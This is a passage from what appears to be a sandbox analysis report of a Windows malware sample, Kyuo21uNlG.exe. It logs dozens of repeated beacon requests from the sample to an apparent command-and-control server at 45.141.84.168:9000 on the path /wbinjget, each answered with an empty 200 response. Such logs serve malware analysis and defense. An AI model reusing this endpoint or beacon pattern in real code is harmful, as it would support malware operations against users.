                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:15 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.44980445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:15.533655882 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:16.843106985 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:16 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.44980845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:17.075093031 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:18.430738926 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:18 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.44981345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:18.658082008 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:21.491774082 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:20 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          41192.168.2.44982145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:21.716373920 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:23.118244886 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:22 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          42192.168.2.44982545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:23.356519938 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:24.715913057 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:23 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          43192.168.2.44982845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:24.959476948 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:26.333911896 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:25 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          44192.168.2.44983445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:26.565715075 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:27.922451973 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:26 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          45192.168.2.44983945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:28.153959036 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:29.509598970 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:28 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          46192.168.2.44984145.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:29.748497009 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:31.058831930 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:30 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          47192.168.2.44984645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:31.305198908 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:32.660895109 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:31 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          48192.168.2.44985245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:32.887161016 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:34.290966988 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:33 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          49192.168.2.44985545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:34.527918100 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:35.840635061 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:34 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          50192.168.2.44986045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:36.075113058 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:37.477300882 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:36 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          51192.168.2.44986545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:37.700011969 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:39.009927988 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:38 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          52192.168.2.44987045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:39.248289108 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:40.650152922 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:40 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          53192.168.2.44987345.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:40.879703999 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:43.344043970 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:42 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          54192.168.2.44987945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:43.575903893 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:44.885777950 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:44 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          55192.168.2.44988245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:45.124739885 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:46.480484962 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:45 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          56192.168.2.44988845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:46.718909025 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:48.029895067 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:47 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          57192.168.2.44989245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:48.265686989 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:49.621320009 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:48 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          58192.168.2.44989645.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:49.859661102 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:51.219125986 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:50 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          59192.168.2.44990045.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:51.450642109 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:52.806507111 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:52 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          60192.168.2.44990445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:53.029778004 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:54.387303114 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:54 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          61192.168.2.44990945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:54.624789953 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:40:56.948429108 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:56 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          62192.168.2.44991245.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:57.185483932 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:40:58.495467901 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:58 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          63192.168.2.44991445.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:40:58.732274055 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:00.044297934 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:40:59 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          64192.168.2.44991545.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:00.347866058 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:01.702780008 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:01 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          65192.168.2.44991745.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:01.937802076 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:03.247607946 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:03 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          66192.168.2.44991845.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:03.484278917 CET111OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Connection: Keep-Alive
                                          Nov 28, 2024 13:41:04.794776917 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:04 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          67192.168.2.44991945.141.84.16890007340C:\Users\user\Desktop\Kyuo21uNlG.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 28, 2024 13:41:05.030066967 CET87OUTGET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1
                                          Host: 45.141.84.168:9000
                                          Nov 28, 2024 13:41:06.339320898 CET414INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Content-Length: 0
                                          Server: Microsoft-HTTPAPI/2.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                          Access-Control-Allow-Headers: *
                                          Access-Control-Expose-Headers:
                                          Accept: */*
                                          Accept-Language: en-US, en
                                          Accept-Charset: ISO-8859-1, utf-8
                                          Host: *:9000
                                          Date: Thu, 28 Nov 2024 12:41:06 GMT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
